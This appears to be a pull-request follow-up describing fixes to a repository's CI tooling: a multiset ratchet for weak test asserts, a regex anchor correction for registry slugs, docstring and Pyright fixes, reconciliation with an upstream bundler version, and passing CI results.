Case E is why the pre-existing tally is a **multiset**, not a set. A set would let N weak asserts at base exempt any number of identical ones now, and duplicate identities are a real shape here rather than a hypothetical - `axcient` carries two asserts with identical `(file, needle, min_count)` today. Each pre-existing weak copy now spends exactly one allowance.

Mutation-tested three times, because a self-test that cannot fail proves nothing: restoring the entry-level comparison fails case A; pointing the base lint at the working tree instead of the base revision fails case D; reverting the multiset to a set fails case E.

**Message and docs.** The failure now says which asserts are the contributor's bill and which are the repo's backlog, and names the heading that actually exists: `docs/reprint-survival.md` gained a `code_only` row in the schema list plus a full section (`#### code_only: what the contains needle is counted in`), and `docs/contributing.md` gained a paragraph for external contributors.

## B3. A security claim the code does not support

Covered inline above, in Piece A's follow-up section. Short version: the `\Z` anchor is correct and stays; the *justification* was false and is replaced by the measurement.

---

## Non-blocking items, also fixed

| Finding | Fix |
| --- | --- |
| `registry.py`'s docstring and error message said all four identifier kinds reach an unquoted shell interpolation. `source_dir` reaches **no** workflow (only Python path joins in `check_pinned_artifacts`, `check_marketplace_sync`, `registry.skill_path`); `cli_binary`/`mcp_binary` reach `env:` assignments, not shell. | `_KIND_REACH` gives each kind its true reason, so a maintainer who trips the `source_dir` rule is not told a falsehood about why. |
| `is_registered_slug.py:40` and `check_engine_freshness.py:71` still carried the `$` anchor this PR declared unsafe. | Both now import `registry.SLUG_RE`. One definition, one anchor; the duplicate patterns are gone. |
| `--lint-asserts` was wired into no workflow, so the 26 findings described as "reported" were reported by nothing. | Added as an **advisory** step (exit 0) in the existing `guards` job. No new job, no matrix widening. |
| The 26th weak assert is a real code symbol, not prose, and was unnamed. | Named above with its line numbers, and marked as needing a real fix rather than an annotation. |
| The risks section hedged that the Go stripper "could in principle mis-scan". | Retired, because it is measurable. Diffed `strip_c_like` against Go's own `go/scanner` (ScanComments) over **all 19616** `.go` files under `skills/`: **0** files where the Python stripper blanked real code, **0** where it missed a real comment. The comparison discriminates - substituting a naive blank-from-`//`-to-EOL stripper makes **825** files disagree. |
| The non-Go strippers *do* mis-strip (`strip_hash` eats `${TAG##*-v}`; `strip_html_comments` blanks to EOF on an unterminated `<!--`), and the docstring called them "language-aware" without naming the limits. | Limits named in the docstring, with reachability measured: assert targets are `.go` 1674, `.json` 559, `.md` 340, `.mod` 2, extension-less 4 - **zero** `.py`, **zero** `.sh` - and none of the 109 distinct `.md` targets carries an unterminated `<!--`. |
| Pyright: `mcpb_bundle.py:657` called `.splitlines()` on a possibly-`None` `__doc__`. | Fixed; `python3 -OO tools/maintainer/mcpb_bundle.py --help` now works instead of crashing before argparse sees an argument. Pyright over the seven touched tools now reports **0 errors**, against **2** on `ce9a8b5` - the second, unreported one was `check_handfixes.py:764` calling `.count` on `strip_comments`'s `str \| None`. |
| `ci.yml` said "nine malformed identifiers"; the self-test asserts eleven. It also claimed the step takes "about three seconds". | Corrected to eleven. The timing claim is **deleted** rather than restated - three self-tests measure 0.68-0.78s locally, and I have not measured them on `ubuntu-latest`. |
| The 62 skill READMEs advertising a one-click `.mcpb` that cannot launch were left implied by `deliberately_skipped`. | Named explicitly in `mcpb_bundle.py`'s module docstring as user-facing debt this file does not fix (`grep -rl 'one-click \`.mcpb\`' skills/*/README.md \| wc -l` -> 62). |

## Reconciled against cli-printing-press 4.31.4

The machine on this branch moved to **4.31.4** (`main` @ `ba4e6914`). Re-read `internal/pipeline/mcpb_bundle.go` and `mcpb_manifest.go` at that version:

- The press still emits **no** `platform_overrides` anywhere - `mcp_config` is `{args, command, env}` and `command` is `${__dirname}/<entry_point>`, confirmed in the golden manifests. The press bundle is a different product: one operator-local archive holding the **one** binary it just cross-compiled. The multi-binary shape this PR writes stays this repo's to own.
- The press stamps the version into the bundled manifest too (`rewriteMCPBManifestVersion`), so `--version` here **matches** upstream behaviour rather than inventing one. That answers the "new undocumented behaviour" note.
- 4.31.2-4.31.4 did change *which* env vars a regenerated manifest declares (#4377, #4431). Inert here: this builder rewrites only `command`, `platform_overrides[*].command`, `entry_point` and `version`, and carries every other manifest key through byte-for-byte.
- The press preserves the source file's mode (`stat.Mode()&0o777`), which is how a 0644 downloaded asset became a non-executable server. This builder writes binaries 0755 unconditionally and `validate` asserts the bit.

All four points are now in `mcpb_bundle.py`'s module docstring, so the next reader does not have to re-derive them.

## Release safety, re-proved after the corrections

```
$ diff rs_base.txt rs_branch.txt   # origin/main's registry.py vs this branch's
$ shasum -a 256 rs_base.txt rs_branch.txt
6f51bc04c79721c4655926f10e9b16f8eeb60acee15f8085fc87c4c955918c03  rs_base.txt
6f51bc04c79721c4655926f10e9b16f8eeb60acee15f8085fc87c4c955918c03  rs_branch.txt

$ git diff --name-only origin/main...HEAD | grep '^skills/' | wc -l
0
```

No version bump, no tag, no `CHANGELOG.md` heading, no file under `skills/`, and `check_handfixes.py` is still absent from `release_matrix.MACHINERY`.

## Cost of the ratchet

The base-revision lint reads each assert's target through `git show <base>:...`, and asserts share targets - the largest ledger (`halopsa`) carries 115 asserts across 37 distinct files. The reader is memoized per file, so one touched ledger fetches three dozen blobs rather than spawning a process per assert. Measured on a prose-only edit to that ledger: **3.25s without the cache, 2.27s with it**, and `--changed` only does this work at all for a change that touches a ledger.

## Every gate, re-run after the corrections

23 of 23 green, including the three self-tests, the full ledger gate across 65 skills, `--changed --base origin/main`, `check_pinned_artifacts` (192 URLs), and `build-catalog --check` with no drift.

## CI on the corrected head

```
$ gh pr checks 307 --json name,bucket -q '[.[]|.bucket]|group_by(.)|map("\(.[0])=\(length)")|join(" ")'
pass=69
```

69 of 69 green on `f199efe`, including `guards` (which now carries the advisory lint) and all 65 build rows. Straight out of the `guards` log:

```
All CI guards passed.
PASS: every generated-file hand-edit in this change is recorded (or part of a reprint), and no assert this change added or weakened is comment-satisfiable.
REPORT: 26 assert(s) can be satisfied by comments alone (the guarded code could be gone and the gate would still pass):
PASS: registry grammar self-test - the live registry (67 skills) validates clean, '_meta' is accepted as a source_dir and rejected as a slug, and 11 malformed identifiers are refused (including the trailing-newline case Python's `$` anchor would have let through).
PASS: check_handfixes self-test - ... `code_only` is refused on an assert with no `contains` so a not_contains check can never be weakened by it (proved on a needle that survives only in a comment), and the --changed ratchet passes a prose-only edit to a pre-existing weak assert while failing a newly added or newly weakened one.
PASS: mcpb_bundle self-test - ...
```

That `REPORT: 26` line is the advisory step doing its job: reported on every run, exit 0, not a merge gate.
